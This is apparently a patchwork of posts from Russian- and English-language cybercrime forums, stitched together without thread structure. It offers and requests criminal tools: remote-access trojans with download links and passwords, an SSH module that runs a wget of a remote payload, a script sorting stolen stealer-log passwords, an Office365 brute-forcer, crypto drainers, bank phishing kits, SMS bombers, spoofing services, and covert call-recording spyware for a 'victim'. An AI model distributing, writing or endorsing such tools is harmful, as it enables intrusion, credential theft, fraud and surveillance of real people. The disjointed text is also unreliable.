Смотрите на методы и на поля и включайте фантазию) В целом можно почти любые
действия автоматизировать.
Можете автотрой замутить))
У модулей есть система приоритетов. То есть какой-то модуль может выполняться
гарантированно раньше, чем другой.
Формат имени модуля такой: "<приоритет число>_имя_модуля.so". Пример:
"1_printing_module.so"
Функция module_callback из модуля 1_printing_module.so будет вызвана
раньше , чем аналогичная функция из модуля 2_xxx.so
Модули позволяют вам безгранично расширять функционал без надобности
ковыряться в моих исходниках и добавлять что-то туда (хотя я очень советую вам
поковырять в них и написать в тему).
Каждый модуль можно писать с чистого листа.
Накину примеры модулей:
Получили доступ -> по IP определили гео -> где-то сохранили
Получили доступ -> проверили root -> скачали трой -> добавили сервис
и так далее.
Всем удачи и пока.
Пишите в треде чё думаете) (ожидаю вопросы по коду и код ревью от всех
властелинов цпп)
p.s компилить модули так:
g++ -shared -nostartfiles -o 1_module.so -fPIC main.cpp ssh_controller.cpp
Инструкция по компилу и использованию в архиве, в файле README.txt
выполнить команду по ssh можно через указатель на SSH. В функции коллбеке такой код:
C++:Copy to clipboard
extern "C" void module_callback(SSH* _ssh, target_info* ti)
{
if(_ssh){
std::string result = "";
if(_ssh->execute_cmd("wget https://.../payload", result)){
// команда выполнена успешно.
// результат команды в result. можете почитать))
}
}
}
Необходимо написать скрипт, который будет взаимодействовать с блокчейном.
Задача :
Использовать скрипт для поднятия баланса на холодном крипто кошельке , при
переводе на него N суммы.
То есть нужно отобразить баланс на кошелке, который продержится у клиента
минимум 3-4 часа.
Какие есть решения?
Что можно использовать?
Как это работает?
(За денежное вознаграждение)
Гарант форума +
Пишите личные сообщения.
Features
Native, independent stub
Stub of this RAT has been written in C++ which makes it independent from .NET
Framework.
Cookies Recovery
Recover cookies from popular Chrome and Firefox in JSON format.
Remote Desktop
Control computers remotely at 60 FPS!
Use mouse and keyboard to control remote computers.
The Remote Desktop feature is realized with a specially crafted VNC module.
Hidden Remote Desktop-HRDP
Control remote computers invisibly!
HRDP module allows you to login to the remote machine without anyone knowing.
You can open the browser even if it is currently opened on the main account.
Privilege Escalation - UAC Bypass
Elevate to Administrator with just 1 click.
This feature has been tested and proven to work on Windows operating systems
from Windows 7 to even the latest Windows 10.
remote webcam
If the remote computer has a webcam connected, you can view the stream live in
the Remote WebCam module.
Password Recovery
Recover password from popular browsers and email clients in seconds!
Grabs passwords from the following browsers:
Chrome, Firefox, Internet Explorer, Edge, Epic, UC, QQ, Opera, Blisk, SRWare
Iron, Brave, Vivaldi, Comodo Dragon, Torch, Slimjet, Cent
Outlook, Thunderbird, Foxmail
Enable Automatic Password Recovery to receive passwords without touching any
buttons!
file manager
Upload and Download files at high speed. You can also execute and delete
files.
Download & Execute
Execute files on remote computers.
Live Keylogger
You can view the keys pressed on remote computer in real time.
Offline Keylogger
Enable Offline Keylogger to save keylogs all the time.
Remote Shell
Send commands to the remote computer's CMD.
Process Manager
View and kill processes using Process Manager.
reverse proxy
Browse the Internet with the remote computer's IP address!
Automatic Tasks
Automatic Tasks are executed when client connects to your WARZONE Server.
- Automatic Password Recovery
- Automatic HRDP installation and Exposure to WAN
- Automatic Download and Execute.
Mass Execute
Download and execute your file on all the connected clients with one click.
smart updater
You use Smart Updater to update your WARZONE RAT file on all the clients AND
new clients until you disable the Smart Updater.
Smart Updater is going to uninstall the old file only if the new file has been
executed successfully AND if
the new file has successfully connected to your WARZONE Server.
HRDP WAN Direct Connection
Expose HRDP to the Internet, WAN.
You can connect directly to the public IP without reverse proxy.
Persistence
Persistence protects the process and the file.
When process or file gets deleted, they will be recovered.
Windows Defender Bypass
WARZONE Client will add itself to exclusions once it executes.
This will prevent Windows Defender from scanning your WARZONE Client.
Всех приветствую, уважаемые. Подскажите приложение на андроид которое скрыто записывает все разговоры на телефоне и отправляет куда-либо. Доступ к телефону который нужно слушать есть, тобишь смогу сам ее скачать и поставить на телефон жертвы.
This is an older project that I did not complete due to various reasons - but thought I would just post it and get some feedback hopefully
Here is the software information
Developed on BAS
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
SisCsfIfBQfuX1WXC--XQ5qEA)
mega.nz
Source: [Invicti Professional Full](https://www.Dr-FarFar.com/invicti- professional-full/)
Всем доброе время суток!
Помогите пожалуйста )
Очень нужен сортер баз mail;pass (По странам)
Только чтобы формировал именно по странам а не по домену.
Легко собирайте информацию о телефонах и электронной почте
1. Извлекает данные из (LinkedIn, Facebook, Instagram, Youtube, Pinterest,
Twitter, Tiktok, Tumblr)
2. Поддержка парсинга любого веб-сайта
3. Поддержка массовой очистки электронной почты, телефонов из списка URL-
адресов
Инструкция по активации прилагаеться
Hidden content for authorized users.
](https://anonfiles.com/A6h5Xaeaze/socialnetworkscraper_1802_rar)
anonfiles.com
https://emkei.cz/ подмена е-mail
narayana.im подмена звонков
easysms.gr (подмена смс номера)
Может кому-то пригодится)
Hidden content for authorized users.
Virus Total exe -
https://www.virustotal.com/gui/file...d8da365b59b58bf6a71bde4486d9992ff66?nocache=1
Virus Total rar -
https://www.virustotal.com/gui/file/19f825780afd26854f3681dc1a04c80232a6c280a5c11e9b1d7c54283ce2928c?nocache=1
URL -
https://drive.google.com/file/d/1HzhVAUZR7bYlCe0Tjt_MumiocQV9wSdm/view?usp=sharing
Key - 000-0000-0000
Есть рабочий RDP brute сейчас крякнутый? Пробывал Z668 - не работает
Нужен софт, который может проверить валид facebook, gmail, gmail ads, и тому
подобное. То есть ,чем больше он может прочекать на валид по кукам - тем
лучше.
Ясно дело, что бесплатный софт не ищу) Готов платить! Рассмотрю варианты на
возможность чека любых аккаунтов пользующихся спросом.
UniversalTools не предлагать! Это просто невероятно медленная система с
очень ограниченным функционалом! Уже имею.
Cookies Manager не предлагать! Полное гавнище, автор которого не следит за
конфигами к софту и они перестают работать через неделю максимум. Уже имею.
Features:
Detect all Logins on system (only need brute passwords).
IP Range Scanner (masscan)
Testing password in different spelling (Large and lower case)
Can bruteforce all windows logins
Support all Windows systems.
Fast speed and logins detection make it best brute for today.
Requirements:
Windows 7 or higher
WinPcap
.Net Framework 4.5
Instruction:
1. Use scanner to find open remote desktop ports.
2. Use Detector on found IPs to detect Windows logins.
3. Use ForcerX to brute passwords for detected logins with Detector.
Note: use scanner on clean direct ip for correct scanning, Detector, ForserX.
ForserS can work on any connection including tor.
Note: ForcerS for brute logins and passwords, that will take much more time.
Note: for best results create good password list by yourself, do not use to
big passwords lists it will take much more time
![hide01.cyou](/proxy.php?image=https%3A%2F%2Fhide01.cyou%2Fwp- content%2Fuploads%2F2021%2F01%2F462b8127981f76690a56afa11660b7f8-32bits-16.png&hash=23a7a08a9ec39a895d466334c06e1fd3&return_error=1) hide01.cyou
Evasion Techniques and Breaching Defenses (PEN-300) Offensive security
просто зарегистрируйтесь и скачайте
Hello today im sharing a great piece of equipement with you guys!
If you know how to implement the target you are going for in this admin you
can take advantage of live-inject functions/fake alerts etc.
Perfect phishing page for doing banks/creditcards
(This is only the basic source code without any project inside. If you want to implement any bank or anything message me on Telegram i will help you)
You must have at least 10 message(s) to view the content.
Click to expand...
От модератора / From moderator: см последний пост в теме, see last post in this thread.
Исследование мобильных устройств является одним из наиболее важных аспектов
работы хакеров и информационных
безопасников.
ElcomSoft IOS Forensic является инструментом, который может быть полезен
для такой работы.
Программа ElcomSoft IOS Forensic позволяет получить доступ к зашифрованным данным на устройствах Apple. Это может быть полезно для экспертов, занимающихся судебной экспертизой и расследованием преступлений. Она позволяет извлекать данные с различных устройств, таких как iPhone, iPad и iPod Touch, включая защищенные паролем данные.
ElcomSoft IOS Forensic также имеет возможность анализировать резервные копии iCloud, что может быть полезно для расследования преступлений и получения ценной информации.
Конечно же данная программа может быть использована и хакерами. Софт можно использовать ее для получения ценной информации, включая личную информацию, финансовые данные, многие технические параметры и другие конфиденциальные данные. Поэтому, использование данной программы дает очень большие возможности для взломщика.
В целом, ElcomSoft IOS Forensic является мощным инструментом, который может помочь специалистам в области информационной безопасности а также~~любителям красть айфоны в метро~~.
VirusTotal : ТЫК
Click to expand...
Mega.nz
You must have at least 5 reaction(s) to view the content.
Click to expand...
RPS420 RAT CRACKED - MINER + STEALER
Скачать : https://anonfiles.com/8bLeL0Hay1/RPS420_RAT_7z Password : cracked
Взято с другова форума использовать на Вирт
CobaltStrike's source code,tested some code and function
Code:Copy to clipboard
https://github.com/Freakboy/CobaltStrike
Click to expand...
I tried "Log Parser/Extractor Search for services in logs" and it didn't work, so I made mine)
Just make sure the logs are not zipped
Have fun!
Python:Copy to clipboard
import os
import time
import re
domains = ["netflix.com", "paypal.com", "onlyfans.com", "xss.is", "xss.as", "agma.io", "portal.azure.com", "cracked[.]io", "minecraft.net", "spotify.com", "twitter.com", "nordaccount.com", "expressvpn.com"]
source_directory = r"C:\Users\Gadr\Desktop\Script\Logs"
destination_directory = r"C:\Users\Gadr\Desktop\Script\des"
count = {}
files_to_search = ["Passwords.txt", "_AllPasswords_list.txt", "passwords.txt"]
for root, dirs, files in os.walk(source_directory):
for file_name in files_to_search:
if file_name in files:
source_file = os.path.join(root, file_name)
# Get the file's last modified date
file_time = os.path.getmtime(source_file)
# Convert the timestamp to a readable format
readable_time = time.ctime(file_time)
# Remove invalid characters from the readable_time variable
cleaned_time = re.sub(r"[/:]", "", readable_time)
with open(source_file, encoding = 'utf-8') as f:
lines = f.readlines()
i = 0
while i < len(lines):
for domain in domains:
if domain in lines[i]:
if domain not in count:
count[domain] = 0
if not os.path.exists(os.path.join(destination_directory, domain)):
os.makedirs(os.path.join(destination_directory, domain))
parent_dir = os.path.basename(root)
destination_file = os.path.join(destination_directory, domain, f"{cleaned_time}.txt")
with open(destination_file, "a", encoding='utf-8', errors='ignore') as out_file:
out_file.write(lines[i])
out_file.write(lines[i+1])
out_file.write(lines[i+2])
out_file.write(lines[i+3])
out_file.write('\n')
count[domain] += 1
i += 1
for domain in domains:
try:
print(f"{count[domain]} of '{domain}' accounts found")
except KeyError:
print(f"No '{domain}' have been found.")
Acunetix Premium now uses the Calver versioning convention. Please note that starting from version 23.6.230628115, we have deprecated support for Windows 8, Server 2012 and Server 2012 R2. Please update your Windows Operating System to Windows 10 (or later) or Windows Server 2016 (or later) to use this and upcoming releases.
If anyone can hack and make a working version please share it here.
Use only on a virtual machine or VPS
Now a lot of people started just selling it as soon as it went public
I'll leave it for everyone
You must spend at least 500 day(s) on the forum to view the content.
EN:
**VenomRat 6.0.3 with sources
Source TG:@ReverseEngineeringLab
RU:
VenomRat 6.0.3 с исходниками **
Источник TG:@ReverseEngineeringLab
Download AnonFiles
sharing citizen Bank full Scama page.
After extraction, go to "citizen Bank" folder > darkx > mail.php > edit with
your own mail.
Use 7zip
Hidden content for authorized users.
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F1c1424a8b0fcd2060c35c713b041d253503a46be5f8a486699ed57bd2aa50092%2FFluteLeeks%2FXM8WyK- Drainer-Leak&hash=2a567bbbb177bfe65373e3a6ce687f6b&return_error=1)
Zelenka & XSS ](https://github.com/FluteLeeks/XM8WyK-Drainer-Leak)
XM8WyK Drainer Leak as seen on Zelenka & XSS. Contribute to FluteLeeks/XM8WyK- Drainer-Leak development by creating an account on GitHub.
github.com
полностью чистый код, купленный на стоке зеленки, плохого качества, а плохой код не стоит 500 долларов, которые я заплатил за него, публикуя здесь, чтобы все XSS могли пользоваться бесплатно.
Братцы подскажите есть ли удобные проги для создания листа по определенному паролю но с разными регистрами, допустим есть пароль adm1n, нужно получить лист со всеми вариантами регистра Adm1n, aDm1n, adm1N и т.д., про хэшкет вкурсе но нужен удобный интерфейс, что бы создание листа занимало минимальное количество времени
Всех приветствую, ищу брут чекер Nord Vpn. Нужен для личного использования, а то в логах много не валида, лень руками искать, в паблик аккаунтах много не валида, либо на аккаунтах много устройств и подключение не работает, в аккаунтах которые продают, ситуация аналогичная, так как продают паблик. Буду благодарен если кто то кинет софт под хайд либо в лс. Искал на других бордах, все безуспешно.
Windows - 21H1 . ISO
Windows Activators - 7 / 8.1 / 10 / 11
Microsoft Visual C++ Drivers - All Collections
Microsoft Office 2013 Windows - XP / Vista / 7 / 8.1 / 10 / 11
-----------------------------------
OWASP ZAP - Web Scanner
MALTEGO- OSINT Tools
VEGA - Web Application Vulnerability Scanner
ENIGMA - Virus FUD Crypter
-----------------------------------
Adobe Photoshop 2022
Adobe Illustrator 2022
Adobe Acrobat - PDF Reader
ABBYY - PDF Editor
-----------------------------------
IPScanners
REVO Unistaller - PRO
XP Shell Theme for Windows 10
-----------------------------------
ProtonVPN
TORVPN - Configured
Download from Google Drive - Ethical Hacking
Download from MEGA - Applications/Programs/Drivers
Да, это старый PHP скрипт для линукса, который был переработан под винду.
Встроенные функции:
Новые функции будут добавляться. Пишите сюда, в ответы
*Для более быстрой проверки DNS записей рекомендую использовать провайдера DNS 1.1.1.1 - выставьте этот айпи в настройках системы.
Скачать:
Hidden content for authorized users.
[ https://github.com/MrFlooky/EmailPassword-Base- Cleaner/releases/download/1.5.1/temp.zip ](https://github.com/MrFlooky/EmailPassword-Base- Cleaner/releases/download/1.5.1/temp.zip)
VT: https://www.virustotal.com/gui/file/1e35fa6ade34402dbb710e1daf78375543d04f6c665f1743763db364a2a679e8
Я хотел бы вставить код или скрыть exe в документе PDF, у кого-нибудь есть решение?
Hi,
I am looking for the IDA Pro 7.7 with Decompiler. I have seen on many Chinese fourms download links, but they all require chinese phone number.. Does anyone have a link to IDA 7.7 that I can download without Chinese phone number? thanks. Looking for English Language version not Chinese
Ищу крякнутый acunetix. Не обязательно свежий. У кого есть , поделитесь. Пожалуйста
open the file and replace site.co with your target site then run the file with python3, for example python3 sqlid.py
download:
![disk.yandex.com.tr](/proxy.php?image=https%3A%2F%2Fyastatic.net%2Fs3%2Fpsf%2Fdisk- public%2F_%2FTTX_DeunCFBKDz3WDkoSB- yHaQ.png&hash=700236d9e48e58a1c3e50e733e4773a6&return_error=1)
Görüntüle ve Yandex Disk'ten indir
![disk.yandex.com.tr](/proxy.php?image=https%3A%2F%2Fyastatic.net%2Fs3%2Fpsf%2Fdisk- public%2F_%2F5hb_sU044zVfPgNsMKf8pNs2_6H.png&hash=7a8adcf3b9b4977c20c8df73c9c222b3&return_error=1) disk.yandex.com.tr
Каждый софт не проверял, кидайте на всякий случай в VirusTotal
Лучший бесплатный бомбер, который лично использую, на форуме уже скидывали его, но это последняя версия 1.21
1. https://cloud.mail.ru/public/VB5t/9JTMFcs9C
При первом входе попросят код для активации вводим это "mobi50"
2. https://cloud.mail.ru/public/M2zY/KSr5eLB14(у меня не заработал)
Turbo Bomber - Самый лучший бомбер на сегодняшний день, около 200 звонков в минуту.
3. https://cloud.mail.ru/public/vYLP/samSW81sc
Бомбер "антихрист". Один из самых первых бомберов на просторах интернета.
4. https://cloud.mail.ru/public/B6HL/Rx12rpK5N ( тоже не заработал)
Мощнейший бомбер - Не советую тестить на себе т.к. просто не сможете его отключить из-за поступающих на телефон звонков и СМС.
5.
https://cloud.mail.ru/public/4tZa/uJokumSqZ 
Privatezilla. Отличный инструмент для настройки приватности в Windows 10.
Функционал:
• Удаление определенных предустановленных приложений.
• Удаление OneDrive
• Открепление меню "Пуск"
• Отключение телеметрии сторонних приложений.
• Удаление Windows Defender
• Блокировка телеметрии через брандмауэр и файлы хоста.
6. https://cloud.mail.ru/public/VdgJ/swUbtUY21 (не проверял)
MailChecker (Чекер мыл)
7. https://cloud.mail.ru/public/HcsG/dRZe1icJj (не проверял)
Seed watcher (Сид-фразы)
Приветствую форумчане, ребятки не по теме конечно, есть у кого подогнать ключик для networkscanner pro, буду признателен, желательно бы расширенную лицуху для portable, перерыл инет так и не нашел на прошку, не видосов не статьей по кряку тоже не нашел(
Download: <https://www.mirrored.to/files/1KHEUDD1/VenomRAT-v6.0.1-Pwn3rzs-
CyberArsenal_0.rar_links>
Pass: Pwn3rzs
Setup:
- Unzip files whenever you want and launch "Venom RAT + HVNC + Stealer +
Grabber.exe" file
- To login use h0nus:Pwn3rzs as credentials and you're good to go!
- Enjoy!
NOTE: The "dark" theme broke due to how I managed to crack it, it's still usable and stable. It will just burn your eyes out lol
Many thanks to our source malroot
Archive Hash:
dbdd89249931a51a84bf249070a554f01ae16c9a1136c3b3c7848acabb43ef07
Привет, может кто поделиться RDP recognizer или посоветовать че-нить другое? Нашел 2 версии, одна не работает совсем - все айпи уходят в еррор, вторая работает но только на 3389, указываю другой порт, а она продолжает чекать 3389. Заранее спасибо
I need dumps 101+ pin! and i need Software X2, Cardpeek, ARTool Ect... Anybody? ASAP please.
Чекер на замен АИО
без привязки
за чекер не несу отвецтвеность,все на ваш страх и риск
чекер от кодера Скруджи
по тестам работает лучше старлея и многих фругих
Invicti – это полностью интегрированное, многопользовательское веб- приложение со встроенными инструментами рабочего процесса и отчетности, которое масштабируется под потребности бизнеса.
Это решение помогает предприятиям любого размера во всех отраслевых вертикалях обеспечить безопасность веб-приложений. Малые предприятия, а также организации из списка Fortune 500 полагаются на Invicti для выявления уязвимостей в своих веб-приложениях и определения приоритетности исправлений.
Download: <https://mega.nz/file/rw0GVABS#gbLW_iJRHZMkP-
QvMTxqq8LpOHNdewdIyIazndRzL_Y>
Password: Pwn3rzs
Note: I didn't patch the "Website Checker" because to me it's not needed to.
Changelog:
NEW SECURITY CHECK
Added the Text4Shell (CVE-2022-42889) check.
IMPROVEMENTS
Updated the embedded Chromium browser.
Improved the importing link to parse the complex example value for RAML.
Added the support for browser flag.
Improved the scan failure messages on the issue page.
Added the URL decode to scanned and crawled URL list reports.
FIXES
Fixed the issue that deleted the customization folder in the agent’s folder
after the update.
Fixed the knowledge base report format to display information clearly.
Enjoy!
Всем привет ! Хотелось написать какой нибудь интересный проект и решил сделать ютуб чекер. Все написано с чистого нуля !
Приступи:
Немного о проекте - ищет кукив папка cookies, Cookies. Использует socks4 или
5, название лога имеет общее количество просмотров, видео и подписчиков, а так
же выводит, есть ли на этих каналах монитизация, если будет 1 канал с
монитизацией он напишет, что есть. Ну и собественно год от минимального к
максимальному. Внутри кукибудут написаны все каналы, которые присутсвуют.
Потоки указывать желательно до 100, ну смотрите сами в общем. Собрал
pyinstaller"ом
Формат прокси: login:pass@ip:port
Перед запуском создайте папку в ней папку с логами и файл с проксями с
добавлением нашего чекера.
Вид чекнутого лога
Spoiler: Результат чека
Собственно VirusTotal:
https://www.virustotal.com/gui/file...fa3472c2990a588f32ec5b929917ea38c5c?nocache=1
Скачать:
https://drive.google.com/file/d/1pheKjIIRmhUuaFjlXtCPevEqWWvFG1G_/view?usp=share_link
Друзья подскажите хороший софт,без лагов.Работал с DCRAT,эта функция оставляет желать лучшего.Помогите по братски,нужен именно удаленный рабочий стол.
Хочу приобрести такой стиллер, кто может подсказать название? Под андроид
сабж
Hidden content for authorized users.
You must have at least 5 reaction(s) to view the content.
Будет полезно при работе в сетях и при бруте дедиков
Download & Crack
THANKS TO Kain1029 - Post Link :- https://xss.is/threads/70902/
Kain1029 Share Source Codes of ConsoleApp3 (Old Version). i don't have the real codes of this version :- https://xss.is/attachments/43778/
NoCry Ultimate Checker Source Code Files leaked by me
Preview:
![](/proxy.php?image=https%3A%2F%2Fexternal-
content.duckduckgo.com%2Fiu%2F%3Fu%3Dhttps%3A%2F%2Fmedia.discordapp.net%2Fattachments%2F996722999543742555%2F1043810247246090302%2Fimage.png&hash=db7904df1e86b8ed1afc16e09ce3d705)![](/proxy.php?image=https%3A%2F%2Fexternal-
content.duckduckgo.com%2Fiu%2F%3Fu%3Dhttps%3A%2F%2Fcdn.discordapp.com%2Fattachments%2F996722999543742555%2F1043809583778500638%2Fimage.png&hash=22d1f60c7123c1bc4ffd4cdae2163d49)
hey im looking for bot can deliver about the 2k or more for my live stream YT
Hidden content for authorized users.
You must have at least 35 message(s) to view the content.
pas: местный
нужен кодер с прямыми руками умеющий обходит сильные защиты для брута ба и
шопов
в чем заключается суть у меня уже есть готовый раскрученный шоп с клиенткой
базой требуется кодер который будет брутить аки или совместно, для продажи в
моем шопе акков
первый контакт в пм
требуется эмулятор андройда, в котором можно менять имэй, сирейник - что бы
как новый смартфон по 1 клику
Главное условие - рабочая камера для фото. Если есть решения или возможно
накодить, плз в ПМ
**Merge 2 files into one file in 30 seconds | Объединить 2 файла в один за 30 секунд
**
Ищу того, кто напишет софт для автореги инстаграм, оплачиваю любые комиссии,
писать в тг
Тг - per4atka
Burp Suite Professional v2021.8.4 + Crack
Released 01 October 2021
You must have at least 5 reaction(s) to view the content.
![](/proxy.php?image=https%3A%2F%2Fi.ibb.co%2FRDBnkQZ%2FNt-Oj8qk1-RIGtbcf-
PVnjeu-Q.png&hash=41dae963e5e42c0c51097942ed3d277d)
Полностью рабочий на данный момент чекер Mega Nz.
2 режима работы:
- Проверка аккаунтов на доступное / занятое место
- Проверка аккаунтов на доступное / занятое место + информация о файлах что
находятся внутри.
Поддержка прокси(Только Http/s)
Загрузка прокси по ссылке.
Автообновление прокси.
Hidden content for authorized users. Скачать
Hidden content for authorized users.
https://www.virustotal.com/gui/file/29bca84eff56f67c98196eef5625f599411fb1e7620698d16fe215a36ac83e21
Слит со стороннего форума из под большого хайда! Всем добра!
нужен срочно стиллер до 10 баксов
За ночь написал для пользователей форума несложную (но эффективную) утилиту
для брута паролей Office365 аккаунтов.
Как говорится, если зарабатываешь на хлеб с площадки, будь добр - сам также
внеси хоть какой-то труд для ее пользователей.
(изначально кто-то недавно писал с запросом на разработку данной утилиты, но
ответ я так и не получил, подумал, напишу и выложу на благо обществу)
Написано на Kotlin
Из ключевых особенностей:
- Опциональное использование проксей для брута аккаунтов (с их
переподключением, в случае ошибки).
- Проверка на отношение адреса к Office365 (Не майкрософт адреса будут
игнорированы).
- Разделение брута на пулы по poolSize аккаунтов в случае брута с не самых
мощных систем (см. разделение на пулы).
- Автоматическое сохранение результатов брута с настраиваемым периодом (см.
конфиг)
- Валидация входящих данных для неопытных юзеров.
Spoiler: Конфиг
bruteDelay = 100
useProxy = true
proxyConnectTryCount = 3
poolSize = 1000
#Как часто сохранять результаты в файл в течение брута (в секундах)
autoSavePeriod = 30
Spoiler: Разделение на пулы
Представим ситуацию, у нас база из 10.5к логинов и 30к паролей.
Максимальный размер пула - максимальное количество аккаунтов, которые будут
обрабатываться параллелльно на данный момент времени.
Выставим максимальный размера пула в конфиге (например 1000),
софт разделит 10.5к логинов на 11 пулов (на каждый пул 1000 аккаунтов и на
последний 500)
и запустит брут таск ПОСЛЕДОВАТЕЛЬНО* (т.е сначала обработается первая тысяча,
потом вторая и т.д).
Spoiler: Первый запуск
Для запуска программы требуется установленная Java миниум 11-й версии.
Запуск максимально прост, в терминале просто вводим:
Code:Copy to clipboard
java -jar название_файла.jar
У нас генерируются 2 папки, в первой - логи (подробная информация об ошибках и
т.п)
Во второй папке содержатся наши конфигурации
brute.conf - Основная конфигурация (см. выше конфиг).
logins.txt - Адреса почт
passwords.txt - Пароли
proxy.txt - Прокси в формате IP:PORT или ссылка на прокси в данном
формате.
Все данные пишем через новую строку, аля
Code:Copy to clipboard
userName@domain.com
userName2@domain.com
pavelDurov@telegram.org
и так же для паролей и прокси.
В папке results - итоговые почтовые адреса в формате login:password.
Сразу говорю - тестировал на небольшом количестве аккаунтов и сделано за ночь,
буду рад, если кто-то, кому понадобится данный софт, протестирует его.
Разработчикам: Если есть вопросы к алгоритму, замечания, которые посчитаю
правильными учту.
Если есть какие-то дополнительные предпочтения (например, добавить поддержку
определенного формата БД) не стесняемся, пишем в комментариях.
Буду исправлять баги и добавлять фичи по мере нагрузки по работе.
Ссылка на скачивание : MEGA
По ссылке исходный код. Собранный билд в /build/libs.
Если не знаете как собрать Gradle проект, пишите, покажу.
Извиняюсь за возможно не очень понятно описанный тутор по запуску (хоть там
ничего сложного), бессонница сказывается.
Задавайте вопросы в комментариях, с удовольствием отвечу на все, что
интересует.
Возьму в аренду накрутчика(софт или панельку) просмотров на ютуб стримы.
Интересует накрутка 5-10к зрителей.
Если для ютуб трансляций есть еще какие то фичи, с радостью готов обсудить.
Ноябрь, депрессия и холод
гуд морнинг
Прикрепляю годный дрейнер для метамаска
Очень простое устройство, но есть проблемы с оптимизацией для мобильных
устройств, нужно додумать
Самый дорогой актив в крипте приходит на наш адрес, работает во всех доступных
сетях
НФТ не забирает
](https://www.virustotal.com/gui/file/d9d3d0abb8c06961160c2d82bfcb8b583d083a0d7b648edc472c1d63dea56d0b?nocache=1)
VirusTotal
www.virustotal.com
Что за меценатство......
Обещанный дренер под sol
Работает с 5 различными кошельками, все в 1 транзакцию
Списывает все токены SOL на наш адрес
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
JKqex2GzUl4ofqeU31ugKmko97i-bAjQDakMX2RA)
mega.nz
](https://www.virustotal.com/gui/file/7c84496ff2961db65f2ffef6e81a9c62e64d85d78857117859f6f529feaf9364?nocache=1)
VirusTotal
www.virustotal.com
You must have at least 3 message(s) to view the content.
Функции:
[ 1 ] Флуд в чаты;
[ 2 ] Флуд в ЛС;
[ 3 ] Флуд в комменты;
[ 4 ] Изменение био;
[ 5 ] Изменение имён;
[ 6 ] Заход в чаты.
pip3 install -r requirements.txt
cd sessions python3 add_session.py НАЗВАНИЕ
Сами сорцы:
You must have at least 1 reaction(s) to view the content.
Всех работяг приветствую! Не нашёл по поиску на форуме более-менее актуальную версию кряка Burp , поэтому делюсь с вами!
Burp Suite – это мультитул для проведения аудита безопасности веб- приложений. Содержит инструменты для составления карты веб-приложения, поиска файлов и папок, модификации запросов, фаззинга, подбора паролей и многое другое.
Версия 2024.3.1.1:
Кряк был найден в относительно популярном TG канале по нашей тематике.
Вроде бы как это хороший и трастовый канал, но всё равно рекомендовал бы
запускать это всё дело на VM.
Ссылка на скачивание -
mega.nz/file/xOUlkDzK#GzcLZh6eNmC9AcOGBb_TGbHg6E4-_xoP9snkfHc5rg4
Ищу взломанную версию программы с сайта www.protware.com
"HTML guardian",
или enterprice/professional. Довольно странно что погуглив, я не смог найти
кряк для него. Прошу вашей помощи, самому найти не получилось.
Привет!
Выкатил апдейт для парсера. Но тк проект почти полностью переписан да и
отличаться от прошлого, решил создать новую тему.
Функционал - сбор user:pass с логов
Поддерживает 5 типов стиллеров на данный момент.
Скорость работы 100+ логов/с (тесты проводились на слабой машинке так что эт
минималка)
Поиск по домену/списку доменов(1+).
Code:Copy to clipboard
usage: main.py [-h] [-i input_dir] [-o out_dir]
Extract user:pass from logs directory for specified domains. By @KijoRomBa:)
optional arguments:
-h, --help show this help message and exit
-i input_dir input dir with logs.
-o out_dir out_dir dir for extracted data.
Exclusive Only To RaidForums Nessus 8.13.1 (#257) Policy Template Updated Plugin Details Last Updated : March 3 at 3:17 AM License Expiration : N/A Plugin...
raidforums.com
Поделитесь хайдом кто открывал для себя или кредитов не жалко, нужная вещь, заранее спасибо!
спасение
Мне нужен инструмент OTP BYPASS SMS.
Могу оплатить после проверки.
Ищу парсер мейлов ютуберов
https://cache.cracked[.]to/22faa37c353453c4af6673e3bca9b57f2f9d638b/68747470733a2f2f7261772e67697468756275736572636f6e74656e742e636f6d2f4c696d6572426f792f496e6665726e6f2f6d61737465722f696d616765732f6c6f676f2e706e67
Современный инструмент командной строки для создания вирусов. Написано на C # для Windows.
[ ! ] Внимание [ ! ]
Некоторые антивирусы могут удалить программу.
[ ! ] Особенности [ ! ]
Скриншот веб-камеры,
Скриншот рабочего стола,
Микрофонный рекордер,
Stealer (пароли, кредитные карты, файлы cookie, история, закладки),
Кейлоггер,
Автозапуск (Реестр, Планировщик задач, StartupDIR),
DDoS (HTTP, UDP, SYN, ICMP, SLOWLORIS),
Брутфорс (SSH, FTP, Telnet),
Диспетчер задач,
Сканер портов,
Сканер Wi-Fi,
Файловый шифровальщик / дикриптор,
Установите антивирус,
Проверьте, есть ли в VirtualBox,
SandBox,
Отладчик,
Контроль мощности,
Блокировка системного ввода,
BSoD,
ForkBomb,
Текст в речь,
Управление буфером обмена,
Регулятор громкости системы,
Отправить нажатие клавиши,
Переместить курсор,
Получить позицию курсора,
Получить заголовок активного окна,
Получить статус батареи,
Мин. / Макс. Все окна,
Сменить обои,
Скачать и загрузить файл (anonfile.com),
Получите BSSID,
Получить координаты по BSSID, WHOIS,
Геоплагин,
Проверка VirusTotal.
[ ! ] Вывод JSON [ ! ]
https://cache.cracked[.]to/7ff501ce0666d9b140791d72a542ec3e68bcd458/68747470733a2f2f7261772e67697468756275736572636f6e74656e742e636f6d2f4c696d6572426f792f496e6665726e6f2f6d61737465722f696d616765732f6578616d706c652e706e67
[!] Скачать [!]
Github | Архив
[!] VirusTotal [!]
Вирус на гитхабе параноик....
ищу hvnc софт или веб.
требования : что бы держал большое кол-во (до 2-3к ботов)
с норм функционалом и поддержкой браузеров - chrome , opera , mazila firefox
Ребят помогите, нужны сайты которые присылают сообщение на телефон об успешной регистрации или хотя бы для какой-то обратной связи(украинские сайты)
Сортировщик IP(формат ip: port),работает с базой Maxmind.
Всем привет! ночью наткнулся на некую программу, с разным функционалом. Хотя
функция у неё одна - наебать !
Ниже привожу список сих программ:
BitcoinRTX
BitGen
BitToolUltimate
FakeBitcoinSender
BitcoinFakeTransaction
Цены варьируются от 250$ до 3290$
Купил бы такую, или принял в дар от кого нибудь.
Интересно, вообще, кто что слышал об этом?
На глупые вопросы в ветке не отвечаю. Пишите в лс
Всем привет. Нужен рабочий кряк акуши.
Раньше использовал https://www.fahai.org/index.php/archives/111/ , да вот
только теперь установить не получаеться, часов 10 с ним проигрался, кряк
ломает софт. У дедушки фахая была вроде свечая версия под линукс, да только
сайт не работает.
Находил возможно рабочее решение тут, да только не пускает:
